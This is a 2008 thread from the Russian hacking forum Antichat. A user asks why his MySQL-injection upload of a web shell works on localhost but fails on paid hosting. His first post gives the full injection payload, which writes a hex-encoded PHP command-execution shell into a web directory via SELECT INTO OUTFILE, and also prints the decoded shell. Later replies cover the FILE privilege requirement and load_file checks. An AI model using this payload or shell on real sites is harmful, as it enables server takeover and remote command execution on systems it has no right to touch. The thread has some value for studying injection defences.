ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Помогите с заливкой шелла через mysql
  #1  
Старый 08.04.2008, 11:40
Аватар для Satman
Satman
Новичок
Регистрация: 22.08.2007
Сообщений: 12
Провел на форуме:
59533

Репутация: 1
По умолчанию Помогите с заливкой шелла через mysql

Хотел потренироваться в заливке шелла.
Написал бажный скрипт, сформировал запрос
Цитата:
test.php?id=2'+union+select+'/*','*/',0x3C3F706870206966202869737365742028245F4745545B 27636D64275D292920206563686F2073797374656D2028245F 4745545B27636D64275D293B203F3E,'/*',5,6,7,'*/'+INTO+OUTFILE+%22/home/test/public_html/shell.php%22/*
где 0x3C3F... это
Цитата:
<?php if (isset ($_GET['cmd'])) echo system ($_GET['cmd']); ?>
На localhost все прекрасно работает.
Заливаю на полноценный платный хостинг потестить,естественно меняю путь ... но результата нет.
Возможно это из-за отсутствия прав FILE ?
Есть ли другие способы заливки шелла,основанные на использовании MySQL Injection ?


P.S.Если разместил не в том разделе, пожалуйста перенесите.
 
Ответить с цитированием

  #2  
Старый 08.04.2008, 11:45
Аватар для Basurman
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию

magic_quotes=on
И на хостингах file_priv у рутов только. Таким способом не зальешь

Последний раз редактировалось Basurman; 08.04.2008 в 11:56..
 
Ответить с цитированием

  #3  
Старый 08.04.2008, 11:56
Аватар для Satman
Satman
Новичок
Регистрация: 22.08.2007
Сообщений: 12
Провел на форуме:
59533

Репутация: 1
По умолчанию

Нет magic_quotes выключенны.
Подскажите,что не так.
Есть ли еще способы заливки шелла через mysql ?
 
Ответить с цитированием

  #4  
Старый 08.04.2008, 14:01
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

проверь файл прив если есть доступ к mysql.user
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #5  
Старый 08.04.2008, 14:14
Аватар для Satman
Satman
Новичок
Регистрация: 22.08.2007
Сообщений: 12
Провел на форуме:
59533

Репутация: 1
По умолчанию

Цитата:
Сообщение от blackybr  
проверь файл прив если есть доступ к mysql.user
К сожалению не могу проверить.
Цитата:
ERROR 1044 (42000): Access denied for user '*****'@'***.**.**.**' to database 'mysql'
Подозреваю, что файл прива нет :-(
Заливка шелла в mysql основана только на select into outfile ? Либо есть еще варианты ?
 
Ответить с цитированием

  #6  
Старый 08.04.2008, 17:37
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Эмм... а почему в information_schema.tables не залить ? (гавно вопрос,но ладно) )))
 
Ответить с цитированием

  #7  
Старый 08.04.2008, 18:04
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Велемир, что ты собрался заливать в таблицу?
 
Ответить с цитированием

  #8  
Старый 08.04.2008, 18:11
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

хз )))))))))))))))))))))))))))ыыыыыы )))
 
Ответить с цитированием

  #9  
Старый 08.04.2008, 19:25
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

есть несколько способов, но на все нужны fil_priv. Проверить иожно легче запросом c load_file
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Эффективные Слепые Иньекции Евгений Минаев Авторские статьи 10 31.05.2008 09:43
Заливка шелла и снятие бана в ipb через mysql darks Форумы 14 26.11.2005 00:03
Общие Рекомендации Защиты (MySQL и SQL Web-интерфейс) k00p3r Чужие Статьи 0 13.06.2005 11:22
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18
SQL инъекция в сервере MySQL k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ